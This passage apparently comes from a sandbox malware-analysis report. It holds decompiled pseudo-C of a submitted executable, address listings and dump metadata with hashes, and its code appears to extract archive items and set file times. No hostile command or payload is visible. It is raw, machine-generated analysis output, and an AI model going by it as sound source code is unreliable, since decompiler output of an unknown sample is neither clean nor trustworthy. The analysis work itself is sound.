										_t506 = _t314;
										__eflags = _t506 - 1;
										if(_t506 != 1) {
											__eflags = _t506 - 0x80004001;
											if(_t506 != 0x80004001) {
												__eflags = _t506;
												if(_t506 == 0) {
													_t315 =  *((intOrPtr*)(_t408 + 0x18));
													__eflags =  *((intOrPtr*)(_t408 + 0x28)) -  *((intOrPtr*)(_t315 + 8));
													if( *((intOrPtr*)(_t408 + 0x28)) ==  *((intOrPtr*)(_t315 + 8))) {
														 *(_t510 - 4) = 9;
														E00403800(_t510 + 0x10);
														L91:
														 *(_t510 + 0x14) =  *(_t510 + 0x14) + 1;
														 *(_t510 - 0x1c) =  *(_t510 - 0x1c) +  *((intOrPtr*)(_t510 - 0x54));
														_t488 =  *(_t510 - 0x38);
														_t502 =  *(_t510 + 0x14);
														asm("adc [ebp-0x18], eax");
														 *(_t510 - 0x40) =  *(_t510 - 0x40) +  *(_t510 - 0x48);
														asm("adc [ebp-0x3c], eax");
														_t407 = 0;
														continue;
													}
													_t506 = E0040CA4C(_t408, _t510, 2);
													_t323 =  *(_t510 + 0x10);
													__eflags = _t506;
													 *(_t510 - 4) = 9;
													if(_t506 == 0) {
														L86:
														__eflags = _t323;
														if(_t323 != 0) {
															 *((intOrPtr*)( *_t323 + 8))(_t323);
														}
														 *(_t510 - 4) = 9;
														goto L91;
													}
													__eflags = _t323;
													if(_t323 != 0) {
														 *((intOrPtr*)( *_t323 + 8))(_t323);
													}
													_t325 =  *(_t510 - 0x14);
													 *(_t510 - 4) = 7;
													__eflags = _t325;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t325 + 8))(_t325);
													}
													 *(_t510 - 4) = 2;
													E0040C380(_t510 - 0x108, __eflags);
													 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
													 *(_t510 - 4) = 0x12;
													L82:
													E004042D6();
													 *(_t510 - 4) = 1;
													E004042AD(_t510 - 0x30);
													_t329 =  *(_t510 + 0x18);
													 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
													__eflags = _t329;
													L83:
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t329 + 8))(_t329);
													}
													_t330 = _t506;
													goto L92;
												}
												_t334 =  *(_t510 + 0x10);
												 *(_t510 - 4) = 9;
												__eflags = _t334;
												if(_t334 != 0) {
													 *((intOrPtr*)( *_t334 + 8))(_t334);
												}
												_t335 =  *(_t510 - 0x14);
												 *(_t510 - 4) = 7;
												__eflags = _t335;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t335 + 8))(_t335);
												}
												 *(_t510 - 4) = 2;
												E0040C380(_t510 - 0x108, __eflags);
												 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
												 *(_t510 - 4) = 0x11;
												goto L82;
											}
											_t506 = E0040CA4C(_t408, _t510, 1);
											_t323 =  *(_t510 + 0x10);
											__eflags = _t506;
											 *(_t510 - 4) = 9;
											if(_t506 == 0) {
												goto L86;
											}
											__eflags = _t323;
											if(_t323 != 0) {
												 *((intOrPtr*)( *_t323 + 8))(_t323);
											}
											_t340 =  *(_t510 - 0x14);
											 *(_t510 - 4) = 7;
											__eflags = _t340;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t340 + 8))(_t340);
											}
											 *(_t510 - 4) = 2;
											E0040C380(_t510 - 0x108, __eflags);
											 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
											 *(_t510 - 4) = 0x10;
											goto L82;
										}
										_t506 = E0040CA4C(_t408, _t510, 2);
										_t323 =  *(_t510 + 0x10);
										__eflags = _t506;
										 *(_t510 - 4) = 9;
										if(_t506 == 0) {
											goto L86;
										}
										__eflags = _t323;
										if(_t323 != 0) {
											 *((intOrPtr*)( *_t323 + 8))(_t323);
										}
										_t345 =  *(_t510 - 0x14);
										 *(_t510 - 4) = 7;
										__eflags = _t345;
										if(__eflags != 0) {
											 *((intOrPtr*)( *_t345 + 8))(_t345);
										}
										 *(_t510 - 4) = 2;
										E0040C380(_t510 - 0x108, __eflags);
										 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
										 *(_t510 - 4) = 0xf;
										goto L82;
									}
									_t349 =  *(_t510 + 0x10);
									 *(_t510 - 4) = 9;
									__eflags = _t349;
									if(_t349 != 0) {
										 *((intOrPtr*)( *_t349 + 8))(_t349);
									}
									goto L91;
								} else {
									_t351 =  *(_t510 + 0x10);
									 *(_t510 - 4) = 9;
									__eflags = _t351;
									if(_t351 != 0) {
										 *((intOrPtr*)( *_t351 + 8))(_t351);
									}
									_t352 =  *(_t510 - 0x14);
									 *(_t510 - 4) = 7;
									__eflags = _t352;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t352 + 8))(_t352);
									}
									 *(_t510 - 4) = 2;
									E0040C380(_t510 - 0x108, __eflags);
									 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
									 *(_t510 - 4) = 0xd;
									E004042D6();
									 *(_t510 - 4) = 1;
									E004042AD(_t510 - 0x30);
									_t356 =  *(_t510 + 0x18);
									 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
									__eflags = _t356;
									if(_t356 != 0) {
										 *((intOrPtr*)( *_t356 + 8))(_t356);
									}
									_t330 =  *(_t510 + 0xc);
									goto L92;
								}
							}
							 *(_t510 - 4) = 7;
							E00403800(_t510 - 0x14);
							 *(_t510 - 4) = 2;
							E0040C380(_t510 - 0x108, __eflags); // executed
							 *(_t510 - 4) = 1;
							E0040C435(_t510 - 0x30);
							_t144 = _t510 - 4;
							 *_t144 =  *(_t510 - 4) & 0x00000000;
							__eflags =  *_t144;
							E00403800(_t510 + 0x18);
							goto L36;
						}
						_t368 =  *(_t510 - 0x14);
						 *(_t510 - 4) = 7;
						__eflags = _t368 - _t407;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t368 + 8))(_t368);
						}
						 *(_t510 - 4) = 2;
						E0040C380(_t510 - 0x108, __eflags);
						 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
						 *(_t510 - 4) = 0xa;
						E004042D6();
						 *(_t510 - 4) = 1;
						E004042AD(_t510 - 0x30);
						_t372 =  *(_t510 + 0x18);
						 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
						__eflags = _t372 - _t407;
						if(_t372 != _t407) {
							 *((intOrPtr*)( *_t372 + 8))(_t372);
						}
						_t330 = _t489;
						goto L92;
					}
					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
					 *(_t510 - 4) = 6;
					E004042D6();
					 *(_t510 - 4) = 1;
					E004042AD(_t510 - 0x30);
					_t329 =  *(_t510 + 0x18);
					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
					__eflags = _t329 - _t407;
					goto L83;
				} else {
					_t401 =  *(_t510 + 0x18);
					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
					if(_t401 != _t407) {
						 *((intOrPtr*)( *_t401 + 8))(_t401);
					}
					L36:
					_t330 = 0;
					L92:
					 *[fs:0x0] =  *((intOrPtr*)(_t510 - 0xc));
					return _t330;
				}
			}

















































                                          0x0040bbc9
                                          0x0040bbce
                                          0x0040bbda
                                          0x0040bbe1
                                          0x0040bbe7
                                          0x0040bbea
                                          0x0040bbef
                                          0x0040bbf2
                                          0x0040bbf5
                                          0x0040bbfa
                                          0x0040bbfa
                                          0x0040bc01
                                          0x0040bc05
                                          0x0040bc08
                                          0x0040bc0b
                                          0x0040bc13
                                          0x0040bc1b
                                          0x0040bc1b
                                          0x0040bc21
                                          0x0040bc40
                                          0x0040bc45
                                          0x0040bc4c
                                          0x0040bc4c
                                          0x0040bc4e
                                          0x0040bc52
                                          0x0040bc55
                                          0x0040bc55
                                          0x0040bc58
                                          0x00000000
                                          0x00000000
                                          0x0040bc5e
                                          0x0040bc62
                                          0x0040bc67
                                          0x0040bc67
                                          0x0040bc6a
                                          0x0040bc6d
                                          0x0040bc76
                                          0x0040bc79
                                          0x0040bc7c
                                          0x0040bcb2
                                          0x0040bcb5
                                          0x0040bcb7
                                          0x0040bcc5
                                          0x0040bcc5
                                          0x0040bccc
                                          0x0040bccf
                                          0x0040bcd4
                                          0x0040bcd7
                                          0x0040bce0
                                          0x0040bce1
                                          0x0040bce5
                                          0x0040bced
                                          0x0040bcf1
                                          0x0040bd04
                                          0x0040bd09
                                          0x0040bd09
                                          0x0040bd09
                                          0x0040bd0c
                                          0x0040bd10
                                          0x0040bd13
                                          0x0040bd16
                                          0x0040bd19
                                          0x0040bd1f
                                          0x0040bd2c
                                          0x0040bd2f
                                          0x0040bd32
                                          0x0040bd35
                                          0x0040bd37
                                          0x0040bd39
                                          0x00000000
                                          0x00000000
                                          0x0040bd43
                                          0x0040bd46
                                          0x0040bd4b
                                          0x0040bd4b
                                          0x00000000
                                          0x0040bd32
                                          0x0040bcbc
                                          0x0040bcc0
                                          0x0040bcc3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040bc7e
                                          0x0040bc7e
                                          0x0040bc7f
                                          0x0040bc8b
                                          0x0040bc8f
                                          0x0040bc93
                                          0x0040bc9e
                                          0x0040bca2
                                          0x0040bca7
                                          0x0040bcaa
                                          0x0040bcab
                                          0x0040bcad
                                          0x00000000
                                          0x0040bcad
                                          0x0040bc7c
                                          0x0040bd51
                                          0x0040bd5f
                                          0x0040bd61
                                          0x0040bd98
                                          0x0040bd9d
                                          0x0040bd9f
                                          0x0040bda3
                                          0x0040bda6
                                          0x0040bda9
                                          0x0040bdac
                                          0x0040bdaf
                                          0x0040bdb5
                                          0x0040bdb8
                                          0x0040bdba
                                          0x0040bdbe
                                          0x0040bdcb
                                          0x0040bdcb
                                          0x0040bdc0
                                          0x0040bdc7
                                          0x0040bdc7
                                          0x0040bdcd
                                          0x0040bdcf
                                          0x0040bdd1
                                          0x0040bdd5
                                          0x0040bdd8
                                          0x0040bddb
                                          0x0040bde0
                                          0x0040bde0
                                          0x0040bde3
                                          0x0040bde9
                                          0x0040bded
                                          0x0040bdf2
                                          0x0040bdf2
                                          0x0040bdf4
                                          0x0040bdf7
                                          0x0040bdfc
                                          0x0040be02
                                          0x0040be08
                                          0x0040be0e
                                          0x0040be16
                                          0x0040be18
                                          0x0040be1a
                                          0x00000000
                                          0x00000000
                                          0x0040be73
                                          0x0040be76
                                          0x0040beb5
                                          0x0040beb7
                                          0x0040beba
                                          0x0040bebd
                                          0x0040bec3
                                          0x0040bec9
                                          0x0040becc
                                          0x0040bed2
                                          0x0040bed5
                                          0x0040bed7
                                          0x0040bedb
                                          0x0040bee8
                                          0x0040bee8
                                          0x0040bedd
                                          0x0040bee4
                                          0x0040bee4
                                          0x0040beea
                                          0x0040beec
                                          0x0040beef
                                          0x0040bef3
                                          0x0040bef6
                                          0x0040befb
                                          0x0040befb
                                          0x0040bf01
                                          0x0040bf05
                                          0x0040bf08
                                          0x0040bf0a
                                          0x0040bf0d
                                          0x0040bf18
                                          0x0040bf18
                                          0x0040bf1e
                                          0x0040bf29
                                          0x0040bf39
                                          0x0040bf3e
                                          0x0040bf40
                                          0x0040bf43
                                          0x0040bfae
                                          0x0040bfb1
                                          0x0040bfd6
                                          0x0040bfdc
                                          0x0040bfe6
                                          0x0040bff2
                                          0x0040c010
                                          0x0040c01a
                                          0x0040c01e
                                          0x0040c033
                                          0x0040c038
                                          0x0040c03a
                                          0x0040c03d
                                          0x0040c093
                                          0x0040c099
                                          0x0040c0ef
                                          0x0040c0f1
                                          0x0040c131
                                          0x0040c137
                                          0x0040c13a
                                          0x0040c1c7
                                          0x0040c238
                                          0x0040c23d
                                          0x0040c240
                                          0x0040c243
                                          0x0040c249
                                          0x0040c24c
                                          0x0040c24f
                                          0x0040c255
                                          0x0040c25b
                                          0x0040c25e
                                          0x00000000
                                          0x0040c25e
                                          0x0040c149
                                          0x0040c14b
                                          0x0040c14e
                                          0x0040c150
                                          0x0040c154
                                          0x0040c1b7
                                          0x0040c1b7
                                          0x0040c1b9
                                          0x0040c1be
                                          0x0040c1be
                                          0x0040c1c1
                                          0x00000000
                                          0x0040c1c1
                                          0x0040c156
                                          0x0040c158
                                          0x0040c15d
                                          0x0040c15d
                                          0x0040c160
                                          0x0040c163
                                          0x0040c167
                                          0x0040c169
                                          0x0040c16e
                                          0x0040c16e
                                          0x0040c177
                                          0x0040c17b
                                          0x0040c180
                                          0x0040c187
                                          0x0040c18b
                                          0x0040c18e
                                          0x0040c196
                                          0x0040c19a
                                          0x0040c19f
                                          0x0040c1a2
                                          0x0040c1a6
                                          0x0040c1a8
                                          0x0040c1a8
                                          0x0040c1ad
                                          0x0040c1ad
                                          0x0040c1b0
                                          0x00000000
                                          0x0040c1b0
                                          0x0040c0f3
                                          0x0040c0f6
                                          0x0040c0fa
                                          0x0040c0fc
                                          0x0040c101
                                          0x0040c101
                                          0x0040c104
                                          0x0040c107
                                          0x0040c10b
                                          0x0040c10d
                                          0x0040c112
                                          0x0040c112
                                          0x0040c11b
                                          0x0040c11f
                                          0x0040c124
                                          0x0040c12b
                                          0x00000000
                                          0x0040c12b
                                          0x0040c0a4
                                          0x0040c0a6
                                          0x0040c0a9
                                          0x0040c0ab
                                          0x0040c0af
                                          0x00000000
                                          0x00000000
                                          0x0040c0b5
                                          0x0040c0b7
                                          0x0040c0bc
                                          0x0040c0bc
                                          0x0040c0bf
                                          0x0040c0c2
                                          0x0040c0c6
                                          0x0040c0c8
                                          0x0040c0cd
                                          0x0040c0cd
                                          0x0040c0d6
                                          0x0040c0da
                                          0x0040c0df
                                          0x0040c0e6
                                          0x00000000
                                          0x0040c0e6
                                          0x0040c048
                                          0x0040c04a
                                          0x0040c04d
                                          0x0040c04f
                                          0x0040c053
                                          0x00000000
                                          0x00000000
                                          0x0040c059
                                          0x0040c05b
                                          0x0040c060
                                          0x0040c060
                                          0x0040c063
                                          0x0040c066
                                          0x0040c06a
                                          0x0040c06c
                                          0x0040c071
                                          0x0040c071
                                          0x0040c07a
                                          0x0040c07e
                                          0x0040c083
                                          0x0040c08a
                                          0x00000000
                                          0x0040c08a
                                          0x0040bfb3
                                          0x0040bfb6
                                          0x0040bfba
                                          0x0040bfbc
                                          0x0040bfc5
                                          0x0040bfc5
                                          0x00000000
                                          0x0040bf45
                                          0x0040bf45
                                          0x0040bf48
                                          0x0040bf4c
                                          0x0040bf4e
                                          0x0040bf53
                                          0x0040bf53
                                          0x0040bf56
                                          0x0040bf59
                                          0x0040bf5d
                                          0x0040bf5f
                                          0x0040bf64
                                          0x0040bf64
                                          0x0040bf6d
                                          0x0040bf71
                                          0x0040bf76
                                          0x0040bf80
                                          0x0040bf84
                                          0x0040bf8c
                                          0x0040bf90
                                          0x0040bf95
                                          0x0040bf98
                                          0x0040bf9c
                                          0x0040bf9e
                                          0x0040bfa3
                                          0x0040bfa3
                                          0x0040bfa6
                                          0x00000000
                                          0x0040bfa6
                                          0x0040bf43
                                          0x0040be7b
                                          0x0040be7f
                                          0x0040be8a
                                          0x0040be8e
                                          0x0040be96
                                          0x0040be9a
                                          0x0040be9f
                                          0x0040be9f
                                          0x0040be9f
                                          0x0040bea6
                                          0x00000000
                                          0x0040bea6
                                          0x0040be1c
                                          0x0040be1f
                                          0x0040be23
                                          0x0040be25
                                          0x0040be2a
                                          0x0040be2a
                                          0x0040be33
                                          0x0040be37
                                          0x0040be3c
                                          0x0040be46
                                          0x0040be4a
                                          0x0040be52
                                          0x0040be56
                                          0x0040be5b
                                          0x0040be5e
                                          0x0040be62
                                          0x0040be64
                                          0x0040be69
                                          0x0040be69
                                          0x0040be6c
                                          0x00000000
                                          0x0040be6c
                                          0x0040bd63
                                          0x0040bd6d
                                          0x0040bd71
                                          0x0040bd79
                                          0x0040bd7d
                                          0x0040bd82
                                          0x0040bd85
                                          0x0040bd89
                                          0x00000000
                                          0x0040bc23
                                          0x0040bc23
                                          0x0040bc26
                                          0x0040bc2c
                                          0x0040bc35
                                          0x0040bc35
                                          0x0040beab
                                          0x0040beab
                                          0x0040c270
                                          0x0040c275
                                          0x0040c27e
                                          0x0040c27e

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                                          • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                                          • Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                                          • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040280D Relevance: 1.9, APIs: 1, Instructions: 384COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0040280D() {
				void* __ebx;
				intOrPtr* _t185;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t195;
				intOrPtr* _t196;
				signed int _t197;
				intOrPtr _t198;
				intOrPtr* _t199;
				intOrPtr* _t204;
				intOrPtr* _t207;
				signed int _t208;
				signed int _t209;
				FILETIME* _t217;
				signed int _t226;
				signed int _t227;
				FILETIME* _t228;
				FILETIME* _t244;
				signed int _t270;
				intOrPtr _t289;
				WCHAR* _t315;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr* _t346;
				signed int _t347;
				void* _t348;

				E00413954(E0041921B, _t348);
				_t344 =  *((intOrPtr*)(_t348 + 8));
				if(E00402D80(_t344 + 0xa8) == 0) {
					_t185 =  *((intOrPtr*)(_t344 + 0x4c));
					_t270 = 0;
					__eflags = _t185;
					if(_t185 != 0) {
						 *((intOrPtr*)( *_t185 + 8))(_t185);
						 *((intOrPtr*)(_t344 + 0x4c)) = 0;
					}
					 *(_t348 - 0x58) = _t270;
					 *(_t348 - 0x56) = _t270;
					_t186 =  *((intOrPtr*)(_t344 + 0xc));
					_t338 =  *(_t348 + 0xc);
					 *(_t348 - 4) = _t270;
					_t187 =  *((intOrPtr*)( *_t186 + 0x18))(_t186, _t338, 3, _t348 - 0x58);
					__eflags = _t187 - _t270;
					if(_t187 == _t270) {
						 *(_t348 - 0x18) = _t270;
						 *(_t348 - 0x14) = _t270;
						 *(_t348 - 0x10) = _t270;
						E00402170(_t348 - 0x18, 3);
						__eflags =  *(_t348 - 0x58) - _t270;
						 *(_t348 - 4) = 1;
						if( *(_t348 - 0x58) != _t270) {
							__eflags =  *(_t348 - 0x58) - 8;
							if( *(_t348 - 0x58) == 8) {
								E00401D1B(_t348 - 0x18,  *((intOrPtr*)(_t348 - 0x50)));
								L12:
								E00401D7A(_t344 + 0x1c, _t348 - 0x18);
								__eflags =  *((intOrPtr*)(_t348 + 0x14)) - _t270;
								if( *((intOrPtr*)(_t348 + 0x14)) != _t270) {
									 *( *(_t348 + 0x10)) = _t270;
									L61:
									E00403A9C( *(_t348 - 0x18));
									 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
									E00405E34(_t348 - 0x58);
									_t195 = 0;
									__eflags = 0;
									goto L62;
								}
								 *(_t348 - 0x28) = _t270;
								 *(_t348 - 0x26) = _t270;
								_t196 =  *((intOrPtr*)(_t344 + 0xc));
								 *(_t348 - 4) = 2;
								_t197 =  *((intOrPtr*)( *_t196 + 0x18))(_t196, _t338, 9, _t348 - 0x28);
								__eflags = _t197 - _t270;
								if(_t197 == _t270) {
									__eflags =  *(_t348 - 0x28) - _t270;
									if( *(_t348 - 0x28) != _t270) {
										__eflags =  *(_t348 - 0x28) - 0x13;
										if( *(_t348 - 0x28) == 0x13) {
											_t198 =  *((intOrPtr*)(_t348 - 0x20));
											L20:
											 *((intOrPtr*)(_t344 + 0x44)) = _t198;
											_t199 =  *((intOrPtr*)(_t344 + 0xc));
											_t197 =  *((intOrPtr*)( *_t199 + 0x18))(_t199, _t338, 6, _t348 - 0x28);
											__eflags = _t197 - _t270;
											if(_t197 != _t270) {
												goto L14;
											}
											__eflags =  *((intOrPtr*)(_t348 - 0x20)) - _t270;
											 *(_t348 + 0xb) = _t270;
											 *(_t348 - 0x74) = _t270;
											 *(_t348 - 0x72) = _t270;
											 *((char*)(_t344 + 0x40)) = _t197 & 0xffffff00 |  *((intOrPtr*)(_t348 - 0x20)) != _t270;
											_t204 =  *((intOrPtr*)(_t344 + 0xc));
											 *(_t348 - 4) = 3;
											_t340 =  *((intOrPtr*)( *_t204 + 0x18))(_t204, _t338, 0x15, _t348 - 0x74);
											__eflags = _t340 - _t270;
											if(_t340 == _t270) {
												__eflags =  *(_t348 - 0x74) - 0xb;
												if( *(_t348 - 0x74) == 0xb) {
													__eflags =  *((intOrPtr*)(_t348 - 0x6c)) - _t270;
													_t66 = _t348 + 0xb;
													 *_t66 =  *((intOrPtr*)(_t348 - 0x6c)) != _t270;
													__eflags =  *_t66;
												}
												 *(_t348 - 4) = 2;
												E00405E34(_t348 - 0x74);
												_t207 =  *((intOrPtr*)(_t344 + 0xc));
												_t197 =  *((intOrPtr*)( *_t207 + 0x18))(_t207,  *(_t348 + 0xc), 0xc, _t348 - 0x28);
												__eflags = _t197 - _t270;
												if(_t197 != _t270) {
													goto L14;
												} else {
													_t208 =  *(_t348 - 0x28) & 0x0000ffff;
													__eflags = _t208 - _t270;
													if(_t208 == _t270) {
														_t209 = _t344 + 0x38;
														 *(_t348 + 0xc) = _t209;
														 *_t209 =  *((intOrPtr*)(_t344 + 0x5c));
														_t289 =  *((intOrPtr*)(_t344 + 0x60));
														L30:
														 *((intOrPtr*)(_t209 + 4)) = _t289;
														E00402155(_t348 - 0x3c);
														_t341 = 0x41b370;
														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
														 *(_t348 - 4) = 4;
														E004044BC(_t348 - 0x18, _t348 - 0x3c, __eflags);
														__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
														if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
															E00401CE1(_t348 - 0x64, _t348 - 0x18);
															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
															 *(_t348 - 4) = 6;
															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
																E004042DE(_t348 - 0x3c);
															}
															__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
															if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
																__eflags =  *(_t348 + 0xb) - _t270;
																if( *(_t348 + 0xb) == _t270) {
																	_push(_t348 - 0x3c); // executed
																	E004027A6(_t344); // executed
																}
															}
															_t335 = _t344 + 0x10;
															_push(_t348 - 0x64);
															E00402634(_t348 - 0x48, _t344 + 0x10);
															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
															 *(_t348 - 4) = 7;
															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
																E00402EE1(_t348 - 0x84);
																_push( *((intOrPtr*)(_t348 - 0x48)));
																 *(_t348 - 4) = 9;
																_t217 = E00405841(_t348 - 0xac, _t335); // executed
																__eflags = _t217;
																if(_t217 == 0) {
																	L48:
																	__eflags =  *(_t348 + 0xb) - _t270;
																	if( *(_t348 + 0xb) != _t270) {
																		L59:
																		E00401D7A(_t344 + 0x28, _t348 - 0x48);
																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																		 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																		 *(_t348 - 4) = 0xd;
																		E004042D6();
																		 *(_t348 - 4) = 2;
																		E004042AD(_t348 - 0x3c);
																		 *(_t348 - 4) = 1;
																		E00405E34(_t348 - 0x28);
																		goto L61;
																	}
																	_push(0x18);
																	_t226 = E00403A76();
																	__eflags = _t226 - _t270;
																	if(_t226 == _t270) {
																		_t342 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t226 + 4) = _t270;
																		 *(_t226 + 8) =  *(_t226 + 8) | 0xffffffff;
																		 *_t226 = 0x41b354;
																		_t342 = _t226;
																	}
																	__eflags = _t342 - _t270;
																	 *(_t344 + 0x48) = _t342;
																	 *(_t348 + 0xc) = _t342;
																	if(_t342 != _t270) {
																		 *((intOrPtr*)( *_t342 + 4))(_t342);
																	}
																	_t227 =  *(_t344 + 0x48);
																	 *(_t227 + 0x10) = _t270;
																	 *(_t348 - 4) = 0xb;
																	 *(_t227 + 0x14) = _t270;
																	_t228 = E00405C43( *((intOrPtr*)(_t348 - 0x48)), 1);
																	__eflags = _t228;
																	if(_t228 != 0) {
																		E0040640D(_t344 + 0x4c, _t342);
																		 *(_t348 - 4) = 9;
																		 *( *(_t348 + 0x10)) = _t342;
																		_t341 = 0x41b370;
																		goto L59;
																	} else {
																		E00401D1B(_t344 + 0xe4,  *0x420280);
																		__eflags = _t342 - _t270;
																		 *(_t348 - 4) = 9;
																		if(_t342 != _t270) {
																			 *((intOrPtr*)( *_t342 + 8))(_t342);
																		}
																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																		 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
																		 *(_t348 - 4) = 0xc;
																		E004042D6();
																		 *(_t348 - 4) = 2;
																		E004042AD(_t348 - 0x3c);
																		 *(_t348 - 4) = 1;
																		E00405E34(_t348 - 0x28);
																		E00403A9C( *(_t348 - 0x18));
																		 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
																		E00405E34(_t348 - 0x58);
																		_t195 = 0x80004005;
																		goto L62;
																	}
																}
																_t244 = E00404BFA(_t270,  *((intOrPtr*)(_t348 - 0x48)));
																__eflags = _t244;
																if(_t244 != 0) {
																	goto L48;
																}
																E00401D1B(_t344 + 0xe4,  *0x42027c);
																E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																 *(_t348 - 4) = 0xa;
																L45:
																_t270 = 0x80004005;
																goto L46;
															} else {
																_t346 = _t344 + 0x28;
																E00401D7A(_t346, _t348 - 0x48);
																__eflags =  *(_t348 + 0xb) - _t270;
																_t315 =  *_t346;
																if( *(_t348 + 0xb) == _t270) {
																	__eflags = 0;
																	E0040483F(_t315, 0, _t270,  *(_t348 + 0xc));
																} else {
																	E0040494E(_t315);
																}
																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																 *(_t348 - 4) = 8;
																L46:
																E004042D6();
																 *(_t348 - 4) = 2;
																E004042AD(_t348 - 0x3c);
																L47:
																 *(_t348 - 4) = 1;
																E00405E34(_t348 - 0x28);
																E00403A9C( *(_t348 - 0x18));
																 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
																E00405E34(_t348 - 0x58);
																_t195 = _t270;
																goto L62;
															}
														}
														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
														 *(_t348 - 4) = 5;
														goto L45;
													}
													__eflags = _t208 - 0x40;
													if(_t208 != 0x40) {
														goto L18;
													}
													_t209 = _t344 + 0x38;
													 *(_t348 + 0xc) = _t209;
													 *_t209 =  *((intOrPtr*)(_t348 - 0x20));
													_t289 =  *((intOrPtr*)(_t348 - 0x1c));
													goto L30;
												}
											}
											 *(_t348 - 4) = 2;
											E00405E34(_t348 - 0x74);
											 *(_t348 - 4) = 1;
											E00405E34(_t348 - 0x28);
											E00403A9C( *(_t348 - 0x18));
											 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
											E00405E34(_t348 - 0x58);
											_t195 = _t340;
											goto L62;
										}
										L18:
										_t270 = 0x80004005;
										goto L47;
									}
									_t198 =  *((intOrPtr*)(_t344 + 0x64));
									goto L20;
								}
								L14:
								_t270 = _t197;
								goto L47;
							}
							E00403A9C( *(_t348 - 0x18));
							_t347 = 0x80004005;
							goto L10;
						}
						E00401D7A(_t348 - 0x18, _t344 + 0x50);
						goto L12;
					} else {
						_t347 = _t187;
						L10:
						 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
						E00405E34(_t348 - 0x58);
						_t195 = _t347;
						L62:
						 *[fs:0x0] =  *((intOrPtr*)(_t348 - 0xc));
						return _t195;
					}
				}
				_t195 = 0x80004004;
				goto L62;
			}































                                          0x00402812
                                          0x0040281f
                                          0x00402830
                                          0x0040283c
                                          0x0040283f
                                          0x00402841
                                          0x00402843
                                          0x00402848
                                          0x0040284b
                                          0x0040284b
                                          0x0040284e
                                          0x00402852
                                          0x00402856
                                          0x00402859
                                          0x0040285f
                                          0x00402869
                                          0x0040286c
                                          0x0040286e
                                          0x00402879
                                          0x0040287c
